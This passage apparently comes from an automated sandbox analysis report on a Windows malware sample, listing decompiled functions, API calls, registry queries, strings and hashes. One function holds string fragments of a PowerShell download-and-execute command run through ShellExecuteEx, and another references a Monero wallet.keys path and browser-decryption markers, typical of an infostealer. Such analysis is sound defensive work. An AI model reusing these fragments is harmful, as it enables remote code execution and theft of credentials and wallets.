                            • RtlAllocateHeap.NTDLL(00000000), ref: 006076AB
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBC78,00000000,00020119,00000000), ref: 006076DD
                            • RegQueryValueExA.ADVAPI32(00000000,0140D908,00000000,00000000,?,000000FF), ref: 006076FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00607708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: d093da2e47cea691d07b6d84c3dfc946049992b483c1a56ca6a97eada2b772eb
                            • Instruction ID: 0bb14f96b8b8b0be10205770137f0f01c4469ee83b6c18882e8f0108ff3352ca
                            • Opcode Fuzzy Hash: d093da2e47cea691d07b6d84c3dfc946049992b483c1a56ca6a97eada2b772eb
                            • Instruction Fuzzy Hash: 2F0162B5A44208BBEB08DBE4DC49FAEB7B9FB88701F104858FA45E72D0D671A9448B51
                            Function 00607720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0060773B
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBC78,00000000,00020119,006076B9), ref: 0060775B
                            • RegQueryValueExA.ADVAPI32(006076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0060777A
                            • RegCloseKey.ADVAPI32(006076B9), ref: 00607784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 7beae9533d637f7e05a1b5f3afc29886a3f27b4268399a6163e6b9944ceb86a5
                            • Instruction ID: 86d78e08d9eddfef7f5f967f9678d61c3d31ff1eb0fc7eebfda353d1115d4ecd
                            • Opcode Fuzzy Hash: 7beae9533d637f7e05a1b5f3afc29886a3f27b4268399a6163e6b9944ceb86a5
                            • Instruction Fuzzy Hash: 860167B5A40308BFDB04DBE4DC49FAEB7B8FB84701F104558FA45A7281D67155408B51
                            Function 006092E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:`,80000000,00000003,00000000,00000003,00000080,00000000,?,00603AEE,?), ref: 006092FC
                            • GetFileSizeEx.KERNEL32(000000FF,:`), ref: 00609319
                            • CloseHandle.KERNEL32(000000FF), ref: 00609327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :`$:`
                            • API String ID: 1378416451-1343392035
                            • Opcode ID: ad4cc6382fa00d942fcb8a4127746300fb01bc647cfc3789ec4b45abdb1a34c2
                            • Instruction ID: 9a146c213ffcff6b62673e82a323d263e6b1c401b02c7173ece62889a9680215
                            • Opcode Fuzzy Hash: ad4cc6382fa00d942fcb8a4127746300fb01bc647cfc3789ec4b45abdb1a34c2
                            • Instruction Fuzzy Hash: 9AF04F35E44208BBDB18DFB0DC49F9E77FABB88710F10C654B691A72C0D671A6018F50
                            Function 005F99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                            • LocalFree.KERNEL32(005F148F), ref: 005F9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: a2ba0aba3c660365c03b215bd5797bddc74fe49047ae769578c8f17105d35b0d
                            • Instruction ID: 1e010214ef8eb2caf0869821197fb24de6b2cf05c49f1a540ffb17ec743d896b
                            • Opcode Fuzzy Hash: a2ba0aba3c660365c03b215bd5797bddc74fe49047ae769578c8f17105d35b0d
                            • Instruction Fuzzy Hash: B83109B4A0020DEFDB14CF94C985BAE7BB5FF88340F108558E951A7290D778AA41CFA1
                            Function 00604780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,0140DB48), ref: 006047DB
                              • Part of subcall function 00608DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00608E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00604801
                            • lstrcat.KERNEL32(?,?), ref: 00604820
                            • lstrcat.KERNEL32(?,?), ref: 00604834
                            • lstrcat.KERNEL32(?,013FB248), ref: 00604847
                            • lstrcat.KERNEL32(?,?), ref: 0060485B
                            • lstrcat.KERNEL32(?,0140D318), ref: 0060486F
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 00608D90: GetFileAttributesA.KERNEL32(00000000,?,005F1B54,?,?,0061564C,?,?,00610E1F), ref: 00608D9F
                              • Part of subcall function 00604570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00604580
                              • Part of subcall function 00604570: RtlAllocateHeap.NTDLL(00000000), ref: 00604587
                              • Part of subcall function 00604570: wsprintfA.USER32 ref: 006045A6
                              • Part of subcall function 00604570: FindFirstFileA.KERNEL32(?,?), ref: 006045BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: d3800811a5adeb3513295b348b14c24139c70e7838b968b66e317116f4a4ee2e
                            • Instruction ID: 03b2a67505fa6a7a8dc235bbf8b0836cafb758ab5dd34810ffcc782139a4bae8
                            • Opcode Fuzzy Hash: d3800811a5adeb3513295b348b14c24139c70e7838b968b66e317116f4a4ee2e
                            • Instruction Fuzzy Hash: 2D3182B2940208ABCB58F7A4DC85EEA737DBB88300F404998B395960C1EE74D6898B95
                            Function 00602C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00602D85
                            Strings
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00602CC4
                            • <, xrefs: 00602D39
                            • ')", xrefs: 00602CB3
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00602D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 4b60e0b86b943a8e79b66f5c90f49fcb8a1bb3c8e57be3ea5c94bc2745af4565
                            • Instruction ID: d88dd550708679912c51551d8d75b5fbc777742c522dde1f5fa5f71e05283bda
                            • Opcode Fuzzy Hash: 4b60e0b86b943a8e79b66f5c90f49fcb8a1bb3c8e57be3ea5c94bc2745af4565
                            • Instruction Fuzzy Hash: 3B41CD719502089ADB9CEBE0C895FDFB776AF14340F40811DE106A71D1DF746A8ACF95
                            Function 005F9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 005F9F41
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: 1c9702da27edbf7558521d78219b9b6aaf50bdb0ebd630671acade204d9970e3
                            • Instruction ID: dba83a6c3374d3acac3a576396a3450462e2bb240377e3c65b3de6d1c3e4ccc9
                            • Opcode Fuzzy Hash: 1c9702da27edbf7558521d78219b9b6aaf50bdb0ebd630671acade204d9970e3
                            • Instruction Fuzzy Hash: A9613E70A4024CDBDB18EFA4DC96FEE777ABF84340F008518FA0A5B191DB746A45CB56
                            Function 006040B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,0140D158,00000000,00020119,?), ref: 006040F4
                            • RegQueryValueExA.ADVAPI32(?,0140DBA8,00000000,00000000,00000000,000000FF), ref: 00604118
                            • RegCloseKey.ADVAPI32(?), ref: 00604122
                            • lstrcat.KERNEL32(?,00000000), ref: 00604147
                            • lstrcat.KERNEL32(?,0140DC80), ref: 0060415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: aad5f134a6dd4f279e5ca61e6ad8e488bfb28555ebd8a2e39959ee2e7a11c090
                            • Instruction ID: a78963d7b4bbfed268c24eb94b71c880ffc2225044a9c5b18fcb703e8542a237
                            • Opcode Fuzzy Hash: aad5f134a6dd4f279e5ca61e6ad8e488bfb28555ebd8a2e39959ee2e7a11c090
                            • Instruction Fuzzy Hash: E0418AB6940108ABDB18FBA0DC46FFE773DB7C8300F40495DB75657181EA759B888B92
                            Function 00607E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00607E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBCE8,00000000,00020119,?), ref: 00607E5E
                            • RegQueryValueExA.ADVAPI32(?,0140D2D8,00000000,00000000,000000FF,000000FF), ref: 00607E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00607E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 2f25993d4d0f9e1e6b0b797296c87fe8f121546f8fd65e864a9ed11ea6a2dc6c
                            • Instruction ID: 19059168020cb661e2056735c3eb90f9b2e483bbd249d3995ca5429e2095eb46
                            • Opcode Fuzzy Hash: 2f25993d4d0f9e1e6b0b797296c87fe8f121546f8fd65e864a9ed11ea6a2dc6c
                            • Instruction Fuzzy Hash: 1C115EB1A84205EBD708CF94DD49FBFBBB9FB44B10F104559F605A7280D7B568018BA1
                            Function 00609260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(0140D9E0,?,?,?,0060140C,?,0140D9E0,00000000), ref: 0060926C
                            • lstrcpyn.KERNEL32(0083AB88,0140D9E0,0140D9E0,?,0060140C,?,0140D9E0), ref: 00609290
                            • lstrlen.KERNEL32(?,?,0060140C,?,0140D9E0), ref: 006092A7
                            • wsprintfA.USER32 ref: 006092C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
